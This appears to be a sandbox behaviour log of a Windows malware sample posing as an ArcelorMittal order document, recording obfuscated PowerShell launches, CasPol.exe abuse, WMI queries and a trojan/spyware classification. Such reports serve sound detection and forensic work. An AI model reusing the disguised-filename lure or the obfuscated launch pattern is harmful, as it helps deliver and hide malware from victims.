Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6F7752D7 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6F63438D -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x69723385 -bxor 677
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C692295 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C692295 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C22CC -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302BFC -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A41D7 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656176C0 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x46696EC0 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x41286F85 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x78383295 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C22CC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302E85 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20692291 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x41286F85 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30296B8B -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x723322FC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A54CC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x727477C4 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6C416EC9 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6F632ACC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C6B85 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783395 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783195 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30302E85 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x692032DD -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x34302BD5 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2E7233FC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x74466BC9 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x65506DCC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6E7467D7 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x28697096 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x31343091 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x202C22CC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302ECC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302BCC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2E7230FC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x616444CC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6C652ACC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x72332E85 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x69207094 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C2A6B85 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x65506DCC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302BCC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x757367D7 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3332389F -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x43616EC9 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A41D7 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6F63438D -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C692295 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C692295 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2E7230FC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C22CC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302BFC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Jump to behavior

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

1_2_0040327D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

File created: C:\Users\user\AppData\Local\Temp\nswC988.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@215/6@1/2

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

Code function: 1_2_00402095 CoCreateInstance,

1_2_00402095

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

Code function: 1_2_00404591 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

1_2_00404591

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4440:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3252:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1660:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1552:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1580:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4192:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5412:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4700:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1660:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2716:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2368:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4312:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7172:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3468:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3468:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3400:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4440:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7172:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5348:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4760:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3400:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5772:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6668:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1808:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4612:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3984:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4700:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4612:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4348:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3252:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1708:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3188:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2920:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1248:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1576:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3368:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1764:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1528:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5412:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2608:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1528:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2368:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4608:120:WilError_03
